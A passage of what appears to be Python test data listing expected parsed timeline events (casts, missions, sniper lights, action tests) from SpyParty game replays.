(Roles.DoubleAgent,),
(None,),
TimelineCategory.SniperLights,
Missions.NoMission,
ActionTest.NoAT,
),
(
"sniper",
"01:35.5",
"marked suspicious.",
(Characters.Helen,),
(1 * 60 + 35.5),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.SniperLights,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"01:34.8",
"sipped drink.",
(Characters.Alice,),
(1 * 60 + 34.8),
None,
(Roles.Spy,),
(None,),
TimelineCategory.Drinks,
Missions.NoMission,
ActionTest.NoAT,
),
(
"sniper",
"01:34.7",
"marked less suspicious.",
(Characters.Salmon,),
(1 * 60 + 34.7),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.SniperLights,
Missions.NoMission,
ActionTest.NoAT,
),
(
"sniper",
"01:33.8",
"marked suspicious.",
(Characters.General,),
(1 * 60 + 33.8),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.SniperLights,
Missions.NoMission,
ActionTest.NoAT,
),
(
"sniper",
"01:32.5",
"marked less suspicious.",
(Characters.Irish,),
(1 * 60 + 32.5),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.SniperLights,
Missions.NoMission,
ActionTest.NoAT,
),
(
"sniper",
"01:32.2",
"marked less suspicious.",
(Characters.Boots,),
(1 * 60 + 32.2),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.SniperLights,
Missions.NoMission,
ActionTest.NoAT,
),
(
"sniper",
"01:31.9",
"marked less suspicious.",
(Characters.Disney,),
(1 * 60 + 31.9),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.SniperLights,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"01:31.6",
"flirtation cooldown expired.",
(None,),
(1 * 60 + 31.6),
None,
(None,),
(None,),
TimelineCategory.NoCategory,
Missions.Seduce,
ActionTest.NoAT,
),
(
"sniper",
"01:31.3",
"marked less suspicious.",
(Characters.Queen,),
(1 * 60 + 31.3),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.SniperLights,
Missions.NoMission,
ActionTest.NoAT,
),
(
"sniper",
"01:30.8",
"marked less suspicious.",
(Characters.Morgan,),
(1 * 60 + 30.8),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.SniperLights,
Missions.NoMission,
ActionTest.NoAT,
),
(
"sniper",
"01:30.2",
"marked neutral suspicion.",
(Characters.Queen,),
(1 * 60 + 30.2),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.SniperLights,
Missions.NoMission,
ActionTest.NoAT,
),
(
"sniper",
"01:30.0",
"marked neutral suspicion.",
(Characters.Morgan,),
(1 * 60 + 30.0),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.SniperLights,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"01:30.0",
"action triggered: seduce target",
(None,),
(1 * 60 + 30.0),
None,
(None,),
(None,),
TimelineCategory.ActionTriggered,
Missions.Seduce,
ActionTest.NoAT,
),
(
"spy",
"01:30.0",
"begin flirtation with seduction target.",
(Characters.Oprah,),
(1 * 60 + 30.0),
None,
(Roles.SeductionTarget,),
(None,),
TimelineCategory.NoCategory,
Missions.Seduce,
ActionTest.NoAT,
),
(
"sniper",
"01:29.0",
"marked less suspicious.",
(Characters.Morgan,),
(1 * 60 + 29.0),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.SniperLights,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"01:28.8",
"action test green: seduce target",
(None,),
(1 * 60 + 28.8),
None,
(None,),
(None,),
TimelineCategory.ActionTest,
Missions.Seduce,
ActionTest.Green,
),
(
"spy",
"01:28.8",
"flirt with seduction target: 100%",
(Characters.Oprah,),
(1 * 60 + 28.8),
None,
(Roles.SeductionTarget,),
(None,),
TimelineCategory.MissionPartial,
Missions.Seduce,
ActionTest.NoAT,
),
(
"spy",
"01:28.8",
"target seduced.",
(Characters.Oprah,),
(1 * 60 + 28.8),
None,
(Roles.SeductionTarget,),
(None,),
TimelineCategory.MissionComplete,
Missions.Seduce,
ActionTest.NoAT,
),
(
"game",
"01:28.8",
"missions completed. 10 second countdown.",
(None,),
(1 * 60 + 28.8),
None,
(None,),
(None,),
TimelineCategory.MissionCountdown,
Missions.NoMission,
ActionTest.NoAT,
),
(
"game",
"01:18.8",
"missions completed successfully.",
(None,),
(1 * 60 + 18.8),
None,
(None,),
(None,),
TimelineCategory.GameEnd,
Missions.NoMission,
ActionTest.NoAT,
),
],
),
(
"-4284672900785851911",
[
(
"spy",
"03:00.0",
"spy cast.",
(Characters.Queen,),
(3 * 60 + 00.0),
None,
(Roles.Spy,),
(None,),
TimelineCategory.Cast,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"03:00.0",
"ambassador cast.",
(Characters.Carlos,),
(3 * 60 + 00.0),
None,
(Roles.Ambassador,),
(None,),
TimelineCategory.Cast,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"03:00.0",
"double agent cast.",
(Characters.Bling,),
(3 * 60 + 00.0),
None,
(Roles.DoubleAgent,),
(None,),
TimelineCategory.Cast,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"03:00.0",
"suspected double agent cast.",
(Characters.Plain,),
(3 * 60 + 00.0),
None,
(Roles.DoubleAgent,),
(None,),
TimelineCategory.Cast,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"03:00.0",
"seduction target cast.",
(Characters.Wheels,),
(3 * 60 + 00.0),
None,
(Roles.SeductionTarget,),
(None,),
TimelineCategory.Cast,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"03:00.0",
"civilian cast.",
(Characters.Oprah,),
(3 * 60 + 00.0),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.Cast,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"03:00.0",
"civilian cast.",
(Characters.Boots,),
(3 * 60 + 00.0),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.Cast,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"03:00.0",
"civilian cast.",
(Characters.Smallman,),
(3 * 60 + 00.0),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.Cast,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"03:00.0",
"civilian cast.",
(Characters.Sari,),
(3 * 60 + 00.0),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.Cast,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"03:00.0",
"civilian cast.",
(Characters.Taft,),
(3 * 60 + 00.0),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.Cast,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"03:00.0",
"civilian cast.",
(Characters.Morgan,),
(3 * 60 + 00.0),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.Cast,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"03:00.0",
"civilian cast.",
(Characters.Helen,),
(3 * 60 + 00.0),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.Cast,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"03:00.0",
"civilian cast.",
(Characters.General,),
(3 * 60 + 00.0),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.Cast,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"03:00.0",
"civilian cast.",
(Characters.Salmon,),
(3 * 60 + 00.0),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.Cast,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"03:00.0",
"civilian cast.",
(Characters.Alice,),
(3 * 60 + 00.0),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.Cast,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"03:00.0",
"civilian cast.",
(Characters.Sikh,),
(3 * 60 + 00.0),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.Cast,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"03:00.0",
"bug ambassador selected.",
(None,),
(3 * 60 + 00.0),
None,
(None,),
(None,),
TimelineCategory.MissionSelected,
Missions.Bug,
ActionTest.NoAT,
),
(
"spy",
"03:00.0",
"contact double agent selected.",
(None,),
(3 * 60 + 00.0),
None,
(None,),
(None,),
TimelineCategory.MissionSelected,
Missions.Contact,
ActionTest.NoAT,
),
(
"spy",
"03:00.0",
"swap statue selected.",
(None,),
(3 * 60 + 00.0),
None,
(None,),
(None,),
TimelineCategory.MissionSelected,
Missions.Swap,
ActionTest.NoAT,
),
(
"spy",
"03:00.0",
"inspect 2 statues selected.",
(None,),
(3 * 60 + 00.0),
None,
(None,),
(None,),
TimelineCategory.MissionSelected,
Missions.Inspect,
ActionTest.NoAT,
),
(
"spy",
"03:00.0",
"seduce target selected.",
(None,),
(3 * 60 + 00.0),
None,
(None,),
(None,),
TimelineCategory.MissionSelected,
Missions.Seduce,
ActionTest.NoAT,
),
(
"spy",
"03:00.0",
"purloin guest list selected.",
(None,),
(3 * 60 + 00.0),
None,
(None,),
(None,),
TimelineCategory.MissionSelected,
Missions.Purloin,
ActionTest.NoAT,
),
(
"spy",
"03:00.0",
"fingerprint ambassador selected.",
(None,),
(3 * 60 + 00.0),
None,
(None,),
(None,),
TimelineCategory.MissionSelected,
Missions.Fingerprint,
ActionTest.NoAT,
),
(
"spy",
"03:00.0",
"bug ambassador enabled.",
(None,),
(3 * 60 + 00.0),
None,
(None,),
(None,),
TimelineCategory.MissionEnabled,
Missions.Bug,
ActionTest.NoAT,
),
(
"spy",
"03:00.0",
"contact double agent enabled.",
(None,),
(3 * 60 + 00.0),
None,
(None,),
(None,),
TimelineCategory.MissionEnabled,
Missions.Contact,
ActionTest.NoAT,
),
(
"spy",
"03:00.0",
"swap statue enabled.",
(None,),
(3 * 60 + 00.0),
None,
(None,),
(None,),
TimelineCategory.MissionEnabled,
Missions.Swap,
ActionTest.NoAT,
),
(
"spy",
"03:00.0",
"inspect 2 statues enabled.",
(None,),
(3 * 60 + 00.0),
None,
(None,),
(None,),
TimelineCategory.MissionEnabled,
Missions.Inspect,
ActionTest.NoAT,
),
(
"spy",
"03:00.0",
"seduce target enabled.",
(None,),
(3 * 60 + 00.0),
None,
(None,),
(None,),
TimelineCategory.MissionEnabled,
Missions.Seduce,
ActionTest.NoAT,
),
(
"spy",
"03:00.0",
"purloin guest list enabled.",
(None,),
(3 * 60 + 00.0),
None,
(None,),
(None,),
TimelineCategory.MissionEnabled,
Missions.Purloin,
ActionTest.NoAT,
),
(
"spy",
"03:00.0",
"fingerprint ambassador enabled.",
(None,),
(3 * 60 + 00.0),
None,
(None,),
(None,),
TimelineCategory.MissionEnabled,
Missions.Fingerprint,
ActionTest.NoAT,
),
],
),
(
"-3717661638173477014",
[
(
"game",
"03:00.0",
"game started.",
(None,),
(3 * 60 + 00.0),
None,
(None,),
(None,),
TimelineCategory.GameStart,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"02:58.3",
"spy player takes control from ai.",
(None,),
(2 * 60 + 58.3),
None,
(None,),
(None,),
TimelineCategory.NoCategory,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"02:58.3",
"spy leaves conversation.",
(None,),
(2 * 60 + 58.3),
None,
(None,),
(None,),
TimelineCategory.Conversation,
Missions.NoMission,
ActionTest.NoAT,
),
(
"sniper",
"02:55.3",
"marked less suspicious.",
(Characters.Carlos,),
(2 * 60 + 55.3),
None,
(Roles.Ambassador,),
(None,),
TimelineCategory.SniperLights,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"02:53.5",
"spy enters conversation.",
(None,),
(2 * 60 + 53.5),
None,
(None,),
(None,),
TimelineCategory.Conversation,
Missions.NoMission,
ActionTest.NoAT,
),
(
"sniper",
"02:53.5",
"marked less suspicious.",
(Characters.Bling,),
(2 * 60 + 53.5),
None,
(Roles.DoubleAgent,),
(None,),
TimelineCategory.SniperLights,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"02:52.8",
"action triggered: seduce target",
(None,),
(2 * 60 + 52.8),
None,
(None,),
(None,),
TimelineCategory.ActionTriggered,
Missions.Seduce,
ActionTest.NoAT,
),
(
"spy",
"02:52.8",
"begin flirtation with seduction target.",
(Characters.Wheels,),
(2 * 60 + 52.8),
None,
(Roles.SeductionTarget,),
(None,),
TimelineCategory.NoCategory,
Missions.Seduce,
ActionTest.NoAT,
),
(
"spy",
"02:51.4",
"action test green: seduce target",
(None,),
(2 * 60 + 51.4),
None,
(None,),
(None,),
TimelineCategory.ActionTest,
Missions.Seduce,
ActionTest.Green,
),
(
"spy",
"02:51.4",
"flirt with seduction target: 51%",
(Characters.Wheels,),
(2 * 60 + 51.4),
None,
(Roles.SeductionTarget,),
(None,),
TimelineCategory.MissionPartial,
Missions.Seduce,
ActionTest.NoAT,
),
(
"sniper",
"02:39.1",
"marked less suspicious.",
(Characters.Sikh,),
(2 * 60 + 39.1),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.SniperLights,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"02:37.8",
"spy leaves conversation.",
(None,),
(2 * 60 + 37.8),
None,
(None,),
(None,),
TimelineCategory.Conversation,
Missions.NoMission,
ActionTest.NoAT,
),
(
"sniper",
"02:37.1",
"marked suspicious.",
(Characters.General,),
(2 * 60 + 37.1),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.SniperLights,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"02:34.1",
"spy enters conversation.",
(None,),
(2 * 60 + 34.1),
None,
(None,),
(None,),
TimelineCategory.Conversation,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"02:34.1",
"spy joined conversation with double agent.",
(Characters.Bling,),
(2 * 60 + 34.1),
None,
(Roles.DoubleAgent,),
(None,),
TimelineCategory.Conversation,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"02:30.4",
"took last sip of drink.",
(Characters.Queen,),
(2 * 60 + 30.4),
None,
(Roles.Spy,),
(None,),
TimelineCategory.Drinks,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"02:29.8",
"flirtation cooldown expired.",
(None,),
(2 * 60 + 29.8),
None,
(None,),
(None,),
TimelineCategory.NoCategory,
Missions.Seduce,
ActionTest.NoAT,
),
(
"sniper",
"02:27.3",
"marked less suspicious.",
(Characters.Alice,),
(2 * 60 + 27.3),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.SniperLights,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"02:18.2",
"action triggered: contact double agent",
(None,),
(2 * 60 + 18.2),
None,
(None,),
(None,),
TimelineCategory.ActionTriggered,
Missions.Contact,
ActionTest.NoAT,
),
(
"spy",
"02:18.2",
"real banana bread started.",
(None,),
(2 * 60 + 18.2),
None,
(None,),
(None,),
TimelineCategory.BananaBread,
Missions.Contact,
ActionTest.NoAT,
),
(
"spy",
"02:17.1",
"action test white: contact double agent",
(None,),
(2 * 60 + 17.1),
None,
(None,),
(None,),
TimelineCategory.ActionTest,
Missions.Contact,
ActionTest.White,
),
(
"spy",
"02:16.2",
"banana bread uttered.",
(None,),
(2 * 60 + 16.2),
None,
(None,),
(None,),
TimelineCategory.BananaBread,
Missions.Contact,
ActionTest.NoAT,
),
(
"spy",
"02:15.7",
"double agent contacted.",
(Characters.Bling,),
(2 * 60 + 15.7),
None,
(Roles.DoubleAgent,),
(None,),
TimelineCategory.MissionComplete,
Missions.Contact,
ActionTest.NoAT,
),
(
"sniper",
"02:14.0",
"marked neutral suspicion.",
(Characters.General,),
(2 * 60 + 14.0),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.SniperLights,
Missions.NoMission,
ActionTest.NoAT,
),
(
"sniper",
"02:13.8",
"marked less suspicious.",
(Characters.General,),
(2 * 60 + 13.8),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.SniperLights,
Missions.NoMission,
ActionTest.NoAT,
),
(
"sniper",
"02:11.7",
"marked less suspicious.",
(Characters.Morgan,),
(2 * 60 + 11.7),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.SniperLights,
Missions.NoMission,
ActionTest.NoAT,
),
(
"sniper",
"02:11.0",
"marked less suspicious.",
(Characters.Sari,),
(2 * 60 + 11.0),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.SniperLights,
Missions.NoMission,
ActionTest.NoAT,
),
(
"sniper",
"02:01.0",
"marked suspicious.",
(Characters.Oprah,),
(2 * 60 + 01.0),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.SniperLights,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"02:00.2",
"spy leaves conversation.",
(None,),
(2 * 60 + 00.2),
None,
(None,),
(None,),
TimelineCategory.Conversation,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"02:00.2",
"spy left conversation with double agent.",
(Characters.Bling,),
(2 * 60 + 00.2),
None,
(Roles.DoubleAgent,),
(None,),
TimelineCategory.Conversation,
Missions.NoMission,
ActionTest.NoAT,
),
],
),
(
"2409467229694115669",
[
(
"sniper",
"02:14.0",
"marked neutral suspicion.",
(Characters.General,),
(2 * 60 + 14.0),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.SniperLights,
Missions.NoMission,
ActionTest.NoAT,
),
(
"sniper",
"02:13.8",
"marked less suspicious.",
(Characters.General,),
(2 * 60 + 13.8),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.SniperLights,
Missions.NoMission,
ActionTest.NoAT,
),
(
"sniper",
"02:11.7",
"marked less suspicious.",
(Characters.Morgan,),
(2 * 60 + 11.7),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.SniperLights,
Missions.NoMission,
ActionTest.NoAT,
),
(
"sniper",
"02:11.0",
"marked less suspicious.",
(Characters.Sari,),
(2 * 60 + 11.0),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.SniperLights,
Missions.NoMission,
ActionTest.NoAT,
),
(
"sniper",
"02:01.0",
"marked suspicious.",
(Characters.Oprah,),
(2 * 60 + 01.0),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.SniperLights,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"02:00.2",
"spy leaves conversation.",
(None,),
(2 * 60 + 00.2),
None,
(None,),
(None,),
TimelineCategory.Conversation,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"02:00.2",
"spy left conversation with double agent.",
(Characters.Bling,),
(2 * 60 + 00.2),
None,
(Roles.DoubleAgent,),
(None,),
TimelineCategory.Conversation,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"01:56.9",
"spy enters conversation.",
(None,),
(1 * 60 + 56.9),
None,
(None,),
(None,),
TimelineCategory.Conversation,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"01:53.2",
"waiter offered drink.",
(Characters.Queen,),
(1 * 60 + 53.2),
None,
(Roles.Spy,),
(None,),
TimelineCategory.Drinks,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"01:51.0",
"rejected drink from waiter.",
(Characters.Queen,),
(1 * 60 + 51.0),
None,
(Roles.Spy,),
(None,),
TimelineCategory.Drinks,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"01:51.0",
"waiter stopped offering drink.",
(Characters.Queen,),
(1 * 60 + 51.0),
None,
(Roles.Spy,),
(None,),
TimelineCategory.Drinks,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"01:49.1",
"action triggered: seduce target",
(None,),
(1 * 60 + 49.1),
None,
(None,),
(None,),
TimelineCategory.ActionTriggered,
Missions.Seduce,
ActionTest.NoAT,
),
(
"spy",
"01:49.1",
"begin flirtation with seduction target.",
(Characters.Wheels,),
(1 * 60 + 49.1),
None,
(Roles.SeductionTarget,),
(None,),
TimelineCategory.NoCategory,
Missions.Seduce,
ActionTest.NoAT,
),
(
"spy",
"01:48.0",
"action test green: seduce target",
(None,),
(1 * 60 + 48.0),
None,
(None,),
(None,),
TimelineCategory.ActionTest,
Missions.Seduce,
ActionTest.Green,
),
(
"spy",
"01:48.0",
"flirt with seduction target: 94%",
(Characters.Wheels,),
(1 * 60 + 48.0),
None,
(Roles.SeductionTarget,),
(None,),
TimelineCategory.MissionPartial,
Missions.Seduce,
ActionTest.NoAT,
),
(
"spy",
"01:39.4",
"spy leaves conversation.",
(None,),
(1 * 60 + 39.4),
None,
(None,),
(None,),
TimelineCategory.Conversation,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"01:31.9",
"picked up statue.",
(None,),
(1 * 60 + 31.9),
None,
(None,),
(None,),
TimelineCategory.Statues,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"01:31.9",
"flirtation cooldown expired.",
(None,),
(1 * 60 + 31.9),
None,
(None,),
(None,),
TimelineCategory.NoCategory,
Missions.Seduce,
ActionTest.NoAT,
),
(
"spy",
"01:28.0",
"action triggered: inspect statues",
(None,),
(1 * 60 + 28.0),
None,
(None,),
(None,),
TimelineCategory.Statues | TimelineCategory.ActionTriggered,
Missions.Inspect,
ActionTest.NoAT,
),
(
"spy",
"01:27.4",
"action test white: inspect statues",
(None,),
(1 * 60 + 27.4),
None,
(None,),
(None,),
TimelineCategory.Statues | TimelineCategory.ActionTest,
Missions.Inspect,
ActionTest.White,
),
(
"spy",
"01:23.0",
"right statue inspected.",
(None,),
(1 * 60 + 23.0),
None,
(None,),
(None,),
TimelineCategory.Statues | TimelineCategory.MissionPartial,
Missions.Inspect,
ActionTest.NoAT,
),
(
"spy",
"01:22.4",
"action triggered: inspect statues",
(None,),
(1 * 60 + 22.4),
None,
(None,),
(None,),
TimelineCategory.Statues | TimelineCategory.ActionTriggered,
Missions.Inspect,
ActionTest.NoAT,
),
(
"spy",
"01:21.8",
"action test white: inspect statues",
(None,),
(1 * 60 + 21.8),
None,
(None,),
(None,),
TimelineCategory.Statues | TimelineCategory.ActionTest,
Missions.Inspect,
ActionTest.White,
),
(
"sniper",
"01:20.1",
"marked spy suspicious.",
(Characters.Queen,),
(1 * 60 + 20.1),
None,
(Roles.Spy,),
(None,),
TimelineCategory.SniperLights,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"01:18.4",
"held statue inspected.",
(None,),
(1 * 60 + 18.4),
None,
(None,),
(None,),
TimelineCategory.Statues | TimelineCategory.MissionPartial,
Missions.Inspect,
ActionTest.NoAT,
),
(
"spy",
"01:18.4",
"all statues inspected.",
(None,),
(1 * 60 + 18.4),
None,
(None,),
(None,),
TimelineCategory.Statues | TimelineCategory.MissionComplete,
Missions.Inspect,
ActionTest.NoAT,
),
(
"spy",
"01:17.1",
"put back statue.",
(None,),
(1 * 60 + 17.1),
None,
(None,),
(None,),
TimelineCategory.Statues,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"01:06.5",
"spy enters conversation.",
(None,),
(1 * 60 + 06.5),
None,
(None,),
(None,),
TimelineCategory.Conversation,
Missions.NoMission,
ActionTest.NoAT,
),
(
"sniper",
"01:05.0",
"took shot.",
(Characters.Boots,),
(1 * 60 + 05.0),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.SniperShot,
Missions.NoMission,
ActionTest.NoAT,
),
(
"game",
"01:01.6",
"sniper shot civilian.",
(Characters.Boots,),
(1 * 60 + 01.6),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.GameEnd,
Missions.NoMission,
ActionTest.NoAT,
),
],
),
(
"4863254294007289095",
[
(
"spy",
"00:24.1",
"real banana bread started.",
(None,),
(00 * 60 + 24.1),
None,
(None,),
(None,),
TimelineCategory.BananaBread,
Missions.Contact,
ActionTest.NoAT,
),
(
"spy",
"00:23.4",
"action test red: contact double agent",
(None,),
(00 * 60 + 23.4),
None,
(None,),
(None,),
TimelineCategory.ActionTest,
Missions.Contact,
ActionTest.Red,
),
(
"spy",
"00:19.1",
"banana bread uttered.",
(None,),
(00 * 60 + 19.1),
None,
(None,),
(None,),
TimelineCategory.BananaBread,
Missions.Contact,
ActionTest.NoAT,
),
(
"spy",
"00:18.1",
"double agent contacted.",
(Characters.Salmon,),
(00 * 60 + 18.1),
None,
(Roles.DoubleAgent,),
(None,),
TimelineCategory.MissionComplete,
Missions.Contact,
ActionTest.NoAT,
),
(
"spy",
"00:08.9",
"45 seconds added to match.",
(None,),
(00 * 60 + 08.9),
None,
(None,),
(None,),
TimelineCategory.TimeAdd,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"00:50.7",
"spy leaves conversation.",
(None,),
(00 * 60 + 50.7),
None,
(None,),
(None,),
TimelineCategory.Conversation,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"00:50.7",
"spy left conversation with double agent.",
(Characters.Salmon,),
(00 * 60 + 50.7),
None,
(Roles.DoubleAgent,),
(None,),
TimelineCategory.Conversation,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"00:50.5",
"spy enters conversation.",
(None,),
(00 * 60 + 50.5),
None,
(None,),
(None,),
TimelineCategory.Conversation,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"00:50.5",
"spy joined conversation with double agent.",
(Characters.Salmon,),
(00 * 60 + 50.5),
None,
(Roles.DoubleAgent,),
(None,),
TimelineCategory.Conversation,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"00:49.2",
"spy picks up briefcase.",
(None,),
(00 * 60 + 49.2),
None,
(None,),
(None,),
TimelineCategory.Briefcase,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"00:49.2",
"picked up fingerprintable briefcase.",
(None,),
(00 * 60 + 49.2),
None,
(None,),
(None,),
TimelineCategory.Briefcase,
Missions.Fingerprint,
ActionTest.NoAT,
),
(
"spy",
"00:47.6",
"spy leaves conversation.",
(None,),
(00 * 60 + 47.6),
None,
(None,),
(None,),
TimelineCategory.Conversation,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"00:47.6",
"spy left conversation with double agent.",
(Characters.Salmon,),
(00 * 60 + 47.6),
None,
(Roles.DoubleAgent,),
(None,),
TimelineCategory.Conversation,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"00:47.3",
"spy enters conversation.",
(None,),
(00 * 60 + 47.3),
None,
(None,),
(None,),
TimelineCategory.Conversation,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"00:47.3",
"spy joined conversation with double agent.",
(Characters.Salmon,),
(00 * 60 + 47.3),
None,
(Roles.DoubleAgent,),
(None,),
TimelineCategory.Conversation,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"00:45.2",
"action triggered: fingerprint ambassador",
(None,),
(00 * 60 + 45.2),
None,
(None,),
(None,),
TimelineCategory.ActionTriggered,
Missions.Fingerprint,
ActionTest.NoAT,
),
(
"spy",
"00:45.2",
"started fingerprinting briefcase.",
(None,),
(00 * 60 + 45.2),
None,
(None,),
(None,),
TimelineCategory.Briefcase,
Missions.Fingerprint,
ActionTest.NoAT,
),
(
"spy",
"00:44.3",
"fingerprinted briefcase.",
(None,),
(00 * 60 + 44.3),
None,
(None,),
(None,),
TimelineCategory.Briefcase | TimelineCategory.MissionPartial,
Missions.Fingerprint,
ActionTest.NoAT,
),
(
"spy",
"00:42.8",
"spy returns briefcase.",
(None,),
(00 * 60 + 42.8),
None,
(None,),
(None,),
TimelineCategory.Briefcase,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"00:41.1",
"45 seconds added to match.",
(None,),
(00 * 60 + 41.1),
None,
(None,),
(None,),
TimelineCategory.TimeAdd,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"01:25.9",
"45 seconds added to match.",
(None,),
(1 * 60 + 25.9),
None,
(None,),
(None,),
TimelineCategory.TimeAdd,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"02:10.8",
"45 seconds added to match.",
(None,),
(2 * 60 + 10.8),
None,
(None,),
(None,),
TimelineCategory.TimeAdd,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"02:53.7",
"spy leaves conversation.",
(None,),
(2 * 60 + 53.7),
None,
(None,),
(None,),
TimelineCategory.Conversation,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"02:53.7",
"spy left conversation with double agent.",
(Characters.Salmon,),
(2 * 60 + 53.7),
None,
(Roles.DoubleAgent,),
(None,),
TimelineCategory.Conversation,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"02:51.5",
"spy enters conversation.",
(None,),
(2 * 60 + 51.5),
None,
(None,),
(None,),
TimelineCategory.Conversation,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"02:51.5",
"spy joined conversation with double agent.",
(Characters.Salmon,),
(2 * 60 + 51.5),
None,
(Roles.DoubleAgent,),
(None,),
TimelineCategory.Conversation,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"02:45.0",
"double agent left conversation with spy.",
(Characters.Salmon,),
(2 * 60 + 45.0),
None,
(Roles.DoubleAgent,),
(None,),
TimelineCategory.Conversation,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"02:44.6",
"ambassador's personal space violated.",
(Characters.Morgan, Characters.Taft),
(2 * 60 + 44.6),
None,
(Roles.Ambassador, Roles.Spy),
(None,),
TimelineCategory.NoCategory,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"02:43.3",
"spy leaves conversation.",
(None,),
(2 * 60 + 43.3),
None,
(None,),
(None,),
TimelineCategory.Conversation,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"02:39.1",
"spy enters conversation.",
(None,),
(2 * 60 + 39.1),
None,
(None,),
(None,),
TimelineCategory.Conversation,
Missions.NoMission,
ActionTest.NoAT,
),
],
),
(
"highlight_and_bad_time",
[
(
"spy",
"02:33.3",
"guest list purloined.",
(Characters.Teal,),
(2 * 60 + 33.3),
None,
(Roles.SeductionTarget,),
